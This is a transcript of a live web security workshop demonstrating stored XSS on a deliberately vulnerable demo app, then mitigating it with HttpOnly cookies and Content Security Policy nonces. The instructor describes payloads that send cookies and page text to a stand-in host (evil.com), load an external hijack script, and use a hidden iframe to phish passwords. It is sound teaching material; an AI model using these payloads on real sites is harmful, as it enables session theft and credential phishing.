Web Security Essentials Live Workshop with Mike Sherov - Part 3
Mike: [00:00] We're back from... [inaudible] is good, too. Can we get like a thumbs up, a plus, or whatever, to indicate folks being back? OK, we're going to flood...Oh my goodness, the pluses are coming. We have enough. We have enough people back. Jeez, OK. I know the trick on how to get everyone to participate. I just tell you if you're there, acknowledge you're there. OK.
[00:40] We're on lesson number nine. We are going to talk about XSS. Before we get started, does anyone want to take a try at explaining what XSS is to the group? I will fill in details. Hopefully, everyone stretched. OK.
Woman: [01:12] You already told us the answer already, Mike, before the break.
Mike: [01:16] I did tell you that, OK. Just to re-talk about XSS, XSS is when an attacker injects a malicious script into a website. They occur when an application either trusts user input and doesn't validate it. If they don't validate it, they don't encode it on the way out. An attacker can put HTML into a payload.
[01:46] If the site doesn't turn it into the encoded form of HTML -- that doesn't turned angle bracket into the encoded version of angle bracket -- the browser will interpret it as HTML. That essentially gives an attacker carte blanche access to your site. If they can inject a script then the browser has no way of knowing it was them that injected the script, and so, they can do everything that you could do.
[02:16] Let's go ahead and make an XSS. We still want to try to get this session ID cookie, so we have mitigated it with HTTPS and HSTS for man-in-the-middle attacks and for the secure flag. We have mitigated it for CSRF by turning one SameSite cookies, and putting in CSRF tokens. We still have it in a cookie on our site, and we want to prevent an attacker from accessing, but the attacker has CSRF.
[03:04] Which exercise am I in? OK. As an attacker, what I'm going to want to do is construct a payload that I can deliver to the person's site. What I'm going to do is, I'm going to login to the target website, long passwords typed many times. I'm going to login to the attacker website, into the website that I want to attack. I want to steal the cookies. Right now I can go into the console as the attacker.
[03:52] I could type document.cookie. Document.cookie is the JavaScript way to pull the cookie out of...like whatever cookies this site currently has, it'll just print it out over here. Here I am in the console saying correct SID is this. If I want to steal this cookie I need a way to make this website execute a script that I wrote that will double-steal a cookie.
[04:27] If I'm a penetration tester or if I'm a hacker, I'm going to try to submit a message that contains a script. I'm going to go ahead and console.log hacked. I'm going to submit that as my message. You could see now that when the page reloaded it says hacked. If I look at the source of the page, we'll understand why. The last message from Mike Sharav was this script with console logged hacked.
[05:07] The browser has no way of knowing that this was my input as a hacker that I put in. It thinks it's just any other script. As a hacker, I now know that I can make a script execute that I want to do stuff with. What do I want to do? I want document.cookie. How am I going to get document.cookie? Well, if I have access to scripts, can I somehow transmit that cookie over wire? The answer is yes.
[05:42] What I'm going to do is, I'm going to go back to my little hacker lab here, and I'm going to make a page. Where am I? I'm going to call this hijack.html. As a hacker, I'm going to keep a running tally of all the payloads that I need. The first thing I'm going to do is I'm going to start a script tag, so I know I have access to script.
[06:17] I ultimately want to make a request to my site that takes the document.cookie. I know I need that. I know I need to transmit this to my endpoint. What I'm going to do is, rather than building a fetch endpoint, rather than writing a fetch call, I can just generate an image and transmit the message as the Image as Source. I'm going to write const image is equal to new image.
[06:47] This will create a new DOM element that's an image element. I can set the image as source to be equal to a URL that I control evil.com:666 and make it submit to my hijack endpoint, which I haven't made just yet, and I'm going to say the payload is equal to document.cookie. Now in order to make sure this transmits correctly, I have to encode it.
[07:26] JavaScript has a built-in URL encoding utility called...actually not JavaScript. The DOM has encode -- I spelled this completely wrong -- encodeURIComponent. I will encode document.cookie and that is going to be my image source. I save. Again, I've now set my image source as evil.com666/hijackpayload/encodeURIComponent/document.cookie.
[08:09] I save this, I take the script, I copy it, I go back over to the website, I submit my script. You can see I get something new in the console. I can see that a network request was sent out to evil.com666/hijackpayload equals my session ID. The problem is I just haven't, as a hacker, made the endpoint yet. Let me go back over here in my index file.
[08:53] As a hacker, I can go ahead and create another route. That route will be called hijack, and it will respond to get requests because that's what the image is going to submit with. I'm going to console.log, then I receive a cookie, and I'm going to console.log the payload parameter of the request. Then I'm going to respond with status 200 and OK.
[09:55] There is that. I'm going to restart my evil.com server. Now I should be able to refresh again. And this is still 404. OK, evil.com666/hijackpayload. I've created a hijack route over here. What did I do wrong? Let's see.
[10:54] Oh, there we go. I submitted my hack, and as you can see, it made a request with my payload. I can now go check the console on my evil.com server running. I have now stolen the session ID cookie from the user. Now, this is worse than the CSRF because this is stored. Any person who visits this site now is going to have this run for them.
[11:23] It'll be sending out all of the session IDs over to my server as an attacker. This is called stored XSS, which is even more dangerous than the other from of XSS, which is called Self-XSS which is when it doesn't gets stored on the server somewhere and played for every single person.
[11:43] Now important to note that we are extremely naive on our current site. We're not doing any sort of XSS. We're not encoding any values back. We're just echoing the information back to the user. Most sites have some form of XSS protection. Also, some frameworks offer XSS protection or some form of XSS protection.
[12:11] I want to dispel a myth that things like React, Vue or any of these other client-side frameworks are not immune from XSS. It's hard to do XSS with React or Vue. They do have some form of default escaping, but there still are things like dangerously set innerHTML. There are other ways in which you could XSS React.
[12:35] If you Google, "Is React XSS safe?" you get a long list of reasons why it is or isn't a 100 percent safe. No matter what, your framework doesn't handle this for you. It handles a lot of it for you, but it doesn't handle everything for you.
[12:55] This idea here that this site is completely open just shows us that it can be as egregious as not doing anything with the input and just spitting it back out to having very nuanced versions of XSS attacks. You can see how quickly we were able to exploit the site and get a session ID oracle out of it. Does anyone have any questions about this before we do the actual exercise?
[13:33] Again, the solution is in the solution folder. What we did is we constructed a hijack script that makes an image, sets its source equal to evil.com666/hijackpayload equals URI-encoded version of the document cookie. We then pasted this into the other site running on the other side of the house, and we made a endpoint called hijack that console logged request.query.payload out on the other side.
[14:15] That would allow us to console.log on the right-hand side here the actual cookie that was received. We'll take six or seven minutes for this. Everyone can try it for themselves. I'll also take any questions while we're doing the exercise.
Man: [14:44] To make sure I'm understanding this correctly, at least in the example, I'll put a malicious script into the submit form and that sent it to the server?
Mike: [15:02] Right.
Man: [15:04] How do other people get it?
Mike: [15:10] Good clarification. I took this and I pasted it into the submit form. On the site, the message form is here. If the user is logged in, then we will push whatever they sent along as the message text onto the message-is-variable. Then when we get the messages, it reads that message-is-variable back out and joins them together.
[15:51] Because we saved their message as is, and because we spit that message back out as is without encoding it, any person who visits this page is going to get those other messages.
Man: [16:10] OK, I get. I understand.
Mike: [16:12] Imagine the messages are a list of all the messages submitted by everybody.
Man: [16:20] Yeah, I get it. That makes more sense. Thank you.
Mike: [16:24] No problem. Because we're doing this all on memory, typically what would happen here is as this message is pushed, we would store this thing in a database. Over here, in messages.join, we would retrieve it from the database and print it out. And so, because we haven't encoded it before printing it out, then you get the raw HTML that we submitted back in as the hacker back out.
[16:58] I'm going to ask a question while we come back. I guess, Will just answered this, but this form of XSS is called a stored XSS. If the attack is successful, is it vulnerable to all users, specific users, just the attacker themselves, and why?
[17:32] Just as Will had said, the answer is all users because essentially this is stored in a database and presented as if it was a script itself for the site, so other visitors would execute it just the same way. Just a reminder, again, that while frameworks offer pretty good protection against XSS, they do not solve all forms of it for you.
[17:59] It's important to know and look up how your frameworks could in general be affected. Cool. We once again have...Sorry, Alex has a question. "If Facebook didn't sanitize user inputs, and let's say you post a bunch of script as a message, like we were doing here, then all my friends would see my message post, would have their cookies sent to my server?"
[18:30] Yes. The answer is yes. Maybe people remember MySpace. MySpace basically was a giant XSS attack. People used to customize their MySpace pages by putting in HTML. That just happened to be allowed by MySpace, before they knew how to sanitize inputs, and that became feature of MySpace. They had a really complicated XSS filter for their site, but people were still able to break into it.
[19:01] There was a hacker named Samy who invented what was known as the Samy worm, where, just by visiting someone's MySpace profile, it would replicate itself to your profile and put the hero, because we used to have a hero, who your hero was, in MySpace. It would say, "Samy is my hero." Then when anyone visited your page, it'd replicate to them.
[19:27] It was basically a worm on MySpace that, by the time they caught, something like 75 percent of MySpace profiles said, "Samy is my hero," on them. Yeah, if you don't escape malicious inputs, it's essentially free reign. It's pretty hilarious. Google Samy worm.
[19:48] Samy is the same person who made this thing called the forever cookie, that uses 30 or 40 different ways to persist information between page refreshes from cookies, to local storage, to session storage, to encoding the value in bits of a PNG that then could extract again later. Pretty serious stuff there. We're back to it. We have our malicious payload from evil.com.
[20:24] We know we could paste it in and steal the cookie. Now, the problem here is that, not only do we have XSS, but we also have the fact that the hacker can access document.cookie. One way in which we want to fix this is making sure our session ID cookie is not available to JavaScript. We need a session ID cookie when we make requests to be sent along with the requests.
[20:52] We don't need to be able to access it on our site via document.cookie. What we can do is, again, Express Session's default is to say HTTP-only, but let's pretend it wasn't. We say HTTP-only equals true, and then that will do the same thing like it did for SameSite and for secure. It'll append;http-only as flag on the cookie.
[21:23] What that does is it still will submit the cookie when you make a request, but it won't allow the cookie to be seen via document.cookie. If we're a hacker, again, we copy in our same malicious payload. We can log into our site again, and we can paste in our hacker message. Sorry, I forgot to clear cookies. Not HTTP-only. I think I did this wrong. Sorry.
[22:32] Once we reopen our window, sometimes, weird fixation stuff happens. We're back over here. We're going to log back in. Why? Why HTTP-only is not set? Sorry, give me one second, folks. It should be true, and why isn't it? Am I not in the right lesson? I'm in nine. I should be in 10. Sorry, wasted your time for a few seconds there. OK, yep, now, we have the HTTP-only flag.
[23:49] Apologies for that blip. We could paste in our hijack text here. Submit, and maybe you need to bump up the text to see this one. You now could see that we still make a request. We still have XSS happening, but at least it's not stealing our cookie anymore. Our service has received cookie, but it received nothing.
[24:21] I'm not going to make you do the exercise on this one, unless you want to, but are we done, right? I guess a couple questions here. What does setting the HTTP-only flag do? Who would like to answer that one? Be brave. Don't worry about answering too many or too little.
[25:02] OK, maybe that question isn't as exciting. The next one will be a little bit more. HTTP-only makes sure the cookie's only sent over requests, but not programmatically accessible via JavaScript. That is, an HTTP-only cookie will not appear in document.cookie, and therefore can't be extracted via XSS.
[25:29] Here's the next question is, even if we have a session ID cookie set to HTTP-only, are we 100 percent guaranteed to never have cookies leak to JavaScript? Would anyone like to answer that one?
Woman: [25:49] Could you say that again?
Mike: [25:52] Sorry, I'll slow down. Even if we have the session ID cookie set to HTTP-only, are we 100 percent guaranteed to never have the cookies leak to JavaScript? This is very similar to the secure flag. Again, HTTP-only is set on a per-cookie basis. You happen to store some other cookie that's sensitive in your browser, you forget to set the HTTP-only on it, it will not protect your cookies.
[26:36] You have to make sure that, for each cookie to do HTTP-only if it needs to be HTTP-only. How does the principle of least privilege, which we've talked about briefly, what is the principle of least privilege, and how does it apply to the HTTP-only flag in this case? I'm looking for anyone to take a shot, even to be wrong. OK. I'll move this along.
[27:29] Principle of least privilege, it says, just to recap there, that any abstraction layer of a software system should only have that access to the information as required to function correctly. In this case, session ID isn't needed on the client. Therefore, we shouldn't allow the browser to have programmatic access to it.
[27:59] POLP, principle of least privilege, would say HTTP-only flag should be set for any cookie that you don't need programmatic access to. Just to remember, whenever you're talking about any sensitive information or any operation of any sort of site, principle of least privilege applies. Let's move right along, and we are going to go to 11. I can do it from 10. Let's do it from 10.
[28:34] We protected our cookie for being stolen. We're done, right? The answer is that we're not done, because the same thing we talked about before, that you have to attack the source of the problem. The source of the problem isn't that cookies are stealable. It's the fact that anything is stealable. We have XSS on our website. That is an alarm bells ringing thing.
[29:05] Just to prove the point here, the next thing we're going to do as the attacker is we're going to go over, and we're going to say, well, not only are we going to steal the cookie, if they blocked me from stealing the cookie, they haven't defended in-depth against what I'm about to do here. I also want to get their Social Security number.
[29:22] I can do far more damage with that thing. Essentially trivially, I can, as the attacker, also steal, let's call it, document.body.innerText. What this'll do, it'll just take the entire text representation of the page body. I can take that bit of code here. I can go back to my server, paste it in.
[30:04] Now, all of a sudden, not only I'm sending a blank cookie, but I'm still also sending this payload that says, "Hey, Mike Sharav, one, two, three, four, five, six, seven, eight, nine." As the hacker, I'm able to, I've now stolen Mike Sharav's Social Security number. Not a ton of stuff to talk about for this specific lesson. This is a very, very short lesson, but it's an important lesson.
[30:40] We were so easily able to exploit this site right after protecting the session ID cookie. What does this tell you about fixing the symptoms of larger problems? Disgust, right? Does anyone want to give an answer as to what fixing symptoms of larger problems does? I know we've been at this for three-and-a-half hours, but I would love if someone was able to take a shot at answering this.
[31:27] Anybody? We'll move this one along. Again, this is reinforcing the principle of least privilege and tagging would cause issues as the way to fix stuff. Oh, I see Will said create more problems, yeah. Fixing specific issues, the way I like to think about fixing specific issues is attacking the root source or the root cause of the problem. Imagine you have a house, and there a hundred open windows.
[32:09] Fixing a specific problem like a cookie when you have XSS is like sneaking in and trying to climb in one window, closing that window, and saying, I'm done. There are still 99 other windows open there. The point is when that when you're doing security work, it may seem quick and easy to fix the vulnerability that's right in front of you, but a really important principle is to attack the root cause.
[32:41] Identify the capability that's being exploited, fix and remitigate that capability exploit directly rather than indirectly.
Man: [32:52] So here, it means just sanitizing the input?
Mike: [32:56] How we do that specifically, a defense in-depth approach would say sanitize input. It would say encode output. It would say use an allow list of acceptable input rather than a blacklist of unacceptable inputs. We also have to talk about the idea that in-line scripts can run. We have to talk about the fact that scripts from anywhere can run.
[33:27] This is, again, the default behavior of browsers and the default behavior of the Internet and the web platform working against us. Alex has a question about XSS protection. XSS protection header is a weak form of the header that we're about to learn about. XSS protection header is a specific filter for one or two specific types of XSS.
[33:53] It's better to have it turned on than to not have it turned on, but by no means is it a capability fix. It doesn't cut off the XSS at its root. This course is not going to get into how to specifically sanitize input and specifically how to encode output because it's going to be so language and domain-specific. It's going to be so tied to your own implementation.
[34:24] You need to do it, but this course isn't going to show exactly how to do that. Instead, we're going to focus on a bigger and more powerful tool that is available in a lot of browsers -- and we'll show you exactly which ones -- called CSP. Does anyone here know what CSP is?
[34:56] CSP, it's effectively not in IE11, but it's in Edge, Firefox, Chrome, and Safari. For IE11, you'll have to resort to either blocking it outright, which I plan to do soon, or rely on sanitization, which is what we want ultimately to do. CSP allows us to specify who should run scripts and under what conditions that should happen. If we look at CSP, there's a website called ContentSecurityPolicy.com.
[35:42] This is the official reference for CSP. CSP is a set of headers that tell you what iframe sources are allowed, what image sources are allowed, what style sheets are allowed, what script sources are allowed. All the capabilities that come by default, you would turn each one of them off, scripts, styles, images, XHR and fetch, fonts, objects, media, iframes, and a set of other things.
[36:15] Form actions, whether you can embed this thing in an iframe, a whole toolkit of behavior. We're going to start off by trying to attack our very first problem, which is that the site will execute in-line scripts. If we look at our code, we don't have any inline scripts. All of our scripts are via source. For example, you have, this is loading static index, this is loading code from jQuery."
[36:50] Our only inline script is the hacker's script. So we're going to want to go ahead and actually implement CSP to say, only allow certain sources. Now in order to do this, where am I? Lesson 12? Just getting back up to speed in lesson 12. First, before we actually turn on the enforcement, CSP has this thing called Report Only mode.
[37:37] Now, why would you want report only mode? Report only mode is, let's say you're working on a large legacy site. We all work on greenfield projects. You might be working on a site that has some inline scripts somewhere. There are dark corners of large legacy websites everywhere. Before you stop running scripts, you might want to know what scripts would be locked if I turned on CSP.
[38:06] We'll start off with CSP Report Only mode. Every time a CSP violation happens, rather than blocking the behavior, it will report that the behavior would have been blocked. I'll pause for a quick question there, if anyone has any questions on what we're about to do.
[38:46] The first thing we're going to do is we need to be able to receive those reports. CSP has by default its format for when a violation happens, and it submits this form via JSON. In the request, in the Express world, we need a different parser to parse out that information. In this case, we need a JSON body parser. We're going to require the NPM package body parser.
[39:21] We're going to say that we're going to use it now. Again, we're going to introduce another middleware here, we'll say app-views. Helmet, once again, provides another set of secure headers, this one called content security policy. Content security policy takes in a configuration object. The query option takes in two things. It takes in a set of directives.
[39:55] These are the CSP directives we want to have happen. We also say report-only-true. Our directives say we only want to allow script sources that are the string self, or HTTPS. Now self says, This Origin, whether it's HTTPS or not means this website or anything that's HTTPS. The reason why we need anything that's HTTPS is because we still have to allow in our messages route, our jQuery code that's over HTTPS.
[40:45] We want to allow that to happen. We want to say that our Report URI is report-violation. Again, we have created a content security policy that allows us to do self and HTTPS with report violation as report URI, and we're doing it in report only mode. We now need to also use that body parser middleware. This, we want to parse JSON.
[41:22] If the MIME type of the request, which is how CSP reports come in as, we want to parse these things as JSON if the MIME type is application CSP report. CSP reports come in with a MIME type of application-cspreport and a JSON body. I can save that, app.usethat. Then last not least, we want to actually add our route for a report violation, which is the same thing as this.
[42:15] This will allow us to post a request and response. I'm going to cheat a little bit here and do a quick copy/paste just so you don't have to watch me type this whole thing out. Just to make sure I didn't have any typos, I'll paste over the whole thing. Our report violation endpoint will console.log CSP violation with the request body and then respond with 200.
[42:54] Now, if we start up our server again, and we take our evil.com payload, we log it back into our site, we submit our message. The first thing you'll notice is in the response, it now has a content security policy report only header that says accept for script source self at HTTPS and send report violations to this URI," that's how you know you did it right. We now paste in our hacker's attack.
[43:42] We hit submit, and look, we now see that there is a report violation request fired off with a full, detailed CSP report that says "Here's URL that was blocked," so it was an inline script. This is a report. It happened at this URL. Here's the policy that was violated, the script source policy on line number four. A whole set of things for you to figure out where your CSP violations are coming from.
[44:16] You can see that we have console logged it in the console. This gets us to a place where we now are able to see not only hackers attacking our site, but also if we accidentally have some stuff that is out of the way. We have approximately 16 minutes left in the course. If you all want to have time to do this exercise, I'm happy to give you all five or six minutes here.
[44:54] I don't think we can complete the exercise in five or six minutes. I'd rather continue through and get to the end of the course and save time at the end. Is that OK with everybody? Can I get a negative one if you want stop and pause here for a seven minutes to do the exercise?
[45:24] I'm going to move forward then. To answer Josh's question though, if the hacker is attacking us from an HTTPS site, would this not protect us, right? That is exactly right. Again, cat-and-mouse game here. We're running in report only mode. The next thing we need to do just to stop and show the proof here, first, we're going to go ahead and turn off report only mode.
[45:56] All we have to do for that is turn off report only mode. We can run the hijack again, and this time you'll see that that script won't execute. Let me just refresh that page. We were getting the report, which is good, but we're not sending that request over to the hacker site, and they're not able to log anything in their logs. We have effectively mitigated XSS attacks, right? No, we have not.
[46:43] What Josh was alluding to in the chat was if they have an HTTPS site, they can attack us. Everyone these days can access HTTPS. There's free SSL certificates using less and less encrypt.com. It's very easy to create SSL or TLS certificates. It wasn't the barrier that it used to be for hackers. What do we want to do? Well, we want to prove the point that the hacker can actually still hack us.
[47:19] As the hacker, I'm going to just take this script. Where is my evil.com static site? I'm going to create a new file in here called index.js. I'm going to take this code, I'm going to paste it into that file, index.js, which now lives at the hacker's index file. I can now, in my attack payload, reference that script. I can just paste this script into the site. What do I have here? Oh, yeah, CSRF. I can paste that in.
[48:23] Now, again, the hacker, their evil hijack is still happening. You can see that hijack to JS doesn't exist.
Man: [48:35] Sorry, Mike. The file in this index is .js not hijack.js.
Mike: [48:58] Yes, good point. This should be renamed hijack.js. Good. I need to apologize. You could see that we can take the script and we can paste it into there, we could hit submit, and we see that the hijack script was downloaded and our payload got sent again. That's proving the point that Josh was making in the chat but in a different way.
[49:56] A better way to do this is to identify a way to separate our scripts that we put there on purpose from scripts that the attacker put there. The way that you do this is using what's known as a nonce. Nonce comes from the term for one-time used number. CSP provides for us a way to say that the type of things that we want to allow is any script tag that has the right nonce attached to it.
[50:31] Just to show what that looks like, first, I'm going to take my crypto package because I need a crytopgraphically-secure-nonce. Then I'm going to create my own middleware here. This middleware is going to generate a 16-byte string otherwise known as 128 bits, which is cryptographically strong enough to reject brute force, save it off as a variable called nonce in my locals.
[51:10] Then in my content security policy, instead of allowing HTTPS, I could pass a callback function that will get executed. The script sources that I will allow is nonce-dash-the value of that nonce. The way this looks when I log in is that my header will say, "Nonce," whatever. To Naomi's earlier point, that this changes on every request. Every request comes in with a new nonce.
[52:18] Now, what we have to do, what we could see here is we could see that because we allow self our index.js file that we loaded from our stack resource is fine, but our jQuery code is blocked. The reason why the jQuery code is blocked is because we haven't added the nonce to the jQuery script tag. We go over to messages and we will use the nonce as the nonce attribute of the script tag.
[52:49] Because we have access to the request or the response, and because the response has locals, we can paste it in over here. We say, load the code from jQuery. Its nonce is equal to the local nonce from the response of the request. The way this looks when we load back up again is, we could see now that jQuery loads fine. If we view the page source, we could see that jQuery has a nonce equal to our nonce.
[53:26] Again, this is similar to CSRF tokens, right? We passed down a cryptographically secure and randomly unguessable value both as a header in our response header, and as a value for script tag that we want to allow. Because a hacker can't guess that value because that value changes every single time, they effectively can't use the nonce themselves.
[53:52] When they paste in their hijack and it has a script tag of evil.com/hijack, then boom, it's blocked by CSP. We've mitigated script XSS. We've mitigated XSS, right? Does anyone have any questions about this?
[54:33] Just to recap we implemented CSP, we're using a non-space approach for script tag, which allows us to specify which scripts we put on the pages ourselves, any scripts entered in by a hacker, or any scripts entered by inline script tags, won't be allowed because our CSP doesn't allow it to happen.
[54:51] The browser gives us the capability to say don't allow these scripts to run, which is what we actually want as our bedrock mitigation. Now, the problem here is that we still haven't mitigated everything. We've mitigated scripts, but our hacker is sneaky. Our hacker is going to also inject a hidden iframe in as the payload.
[55:26] That's going to put to his steal file. We're going to save this as steal.html. That is going to execute a script that prompts the user for the password. Prompt is a function in the DOM that literally pops the little pop-up window that asks you a question that you can put your answer into. We made the steal.html file, our hijack will reference it, but we've our iframe hidden.
[56:05] What this looks like, when we go to the site and I paste this in as my payload, now you can't see the iframe, a pop-up appears on the site that says enter your password. Yeah, there is some mitigation here where Chrome says this came from evil.com and not from localhost.charlesproxy.com, but if I make my domain name look close to charlesproxy.com and not evil.com.
[56:36] If I said Charles Proxy with two Ys or Charles Proxy with a zero instead of an O, you'd be none the wiser. All we've done so far with CSP is mitigate scripts. We haven't mitigated iframes, which have just as many attacks such as this. We'll go back to our code again. Now we need to know that because we've proven that there is attacks in basically every single avenue.
[57:16] We have an attack from an image tag. We have attack from script tags. We have attack from iframes. There are attacks based upon style tags that people inject. People can modify the content property of an element to show a fake message. What we want to do as a default is say, "Don't allow anything. We ourselves are going to decide what to allow."
[57:42] We could do this by effectively using that same script source directive for the ones that we want to allow. We can say self-source equals that. We can now say that script source uses it. We're also going to say we want to use that for XHR requests. We also want to say that we want to use that for images and only allow images from our own site.
[58:28] We'll say that we only want to allow that for style tags. You know what? We don't actually care about iframes. We don't even want iframes! Don't even allow iframes to connect. What CSP has is a thing called default source. The default of default source is everything. We want to say that the default source that applies to all of these different sub-resources is actually none.
[58:59] You use the string none. This says, "If there isn't a more specific source, like script, connect, image or style, use the default for the source that you want." This will implicitly say that the source for iframes is none.
[59:17] If I save that off, I go back to this page and I log back in again, I can see first and foremost that my response looks like this, default source none, script source is self or this nonce, XHR connect source is self or that nonce, image source is self or that nonce, style source is self or that nonce, send all of our violations to report violation.
[59:46] Now when I paste in my steal script, I can paste all three of these attacks in at once. I hit submit. Boom, I get three violations. One for the in-line script violation, one for the evil.com hijack violation, and one for the violation of evil.com as an iframe.
[60:23] You absolutely must and still should do input sanitization and output encoding to protect against CSP, especially for older browsers like IE 11 and before. CSP gives you a much more robust browser capability to block this stuff. There was a vulnerability recently in Google. Where is this? I'll find the article another day. Here!
[61:07] There was an awesome vulnerability in the new Gmail dynamic email feature. XSS, right? But CSP stopped the code from ever executing. CSP gives you an underlying robust mechanism to stop XSS dead in its tracks.
[61:31] I'm sorry I had to blow through some of the final XSS stuff. I wanted to make sure we finished by four o' clock. I am still free and happy to answer questions of whoever wants to stick around and ask them. I also encourage you to go through the solution, the questions, and the exercises on your own time. I'm happy to stick around and answer questions.
[62:01] Just to recap, give the two-minute version, we went through man in the middle and how to mitigate that with HTTPS, HSTS, and secure cookies. We mitigated CSRF with same-site cookies and CSRF tokens. We mitigated XSS with content security policy. All three of which are completely backend language agnostic, all things you could do in your own given language.
[62:33] I really encourage folks to explore more. Go on the OWASP website, read about how this stuff works. This will also be available as a self-paced workshop later this year. I'm planning much more security content ahead. I don't think you need me to learn this stuff. I really was mostly here to bring these type of issues to everyone's attention.
[63:03] I want to thank everyone for participating. Any questions? I'll take as many as I can. Chan says first, "Man in the middle can be mitigated by HTTPS, secure cookies, and HSTS." That is correct, except in the case where someone else owns your network already. If you're at your job, there might be a corporate server that's in between you and the Internet anyway.
[63:36] You should never assume that just because you have HTTPS that you actually have a secure line, especially in controlled environments like corporate settings. Josh said, "If we needed third-party iframes, would we just use nonce with iframe to whitelist iframe?" Yes, Josh, you would do that. You would use nonce to whitelist iframe that you're putting on there as well.
[64:01] If you're a UGC website, where users are submitting iframes as HTML, I would suggest that you ship out everything except for the iframe source. Then put back in your own iframe with the nonce there. Also, if you're only expecting iframes from a specific domain, CSP also allows you to specify domains, not just protocols or nonces.
[64:25] If you have a specific whitelist of domains you'll accept, you can just throw those in there as well. Also, you don't have to use the chat if you want to speak up. Thanks for all the kudos, everybody. Really appreciate all the participation. Hopefully it didn't seem like this was my first time, even though it was my first time teaching a live remote workshop.
[64:59] I take the silence as you all being in awe of what you just learned. I will say thanks so much and see you on the other side. Bye. Have a great rest of your day, night, morning or whatever it is where you are. Bye, everyone.
Member comments are a way for members to communicate, interact, and ask questions about a lesson.
The instructor or someone from the community might respond to your question Here are a few basic guidelines to commenting on egghead.io
Be on-Topic
Comments are for discussing a lesson. If you're having a general issue with the website functionality, please contact us at support@egghead.io.
Avoid meta-discussion
Code Problems?
Should be accompanied by code! Codesandbox or Stackblitz provide a way to share code and discuss it in context
Details and Context
Vague question? Vague answer. Any details and context you can provide will lure more interesting answers!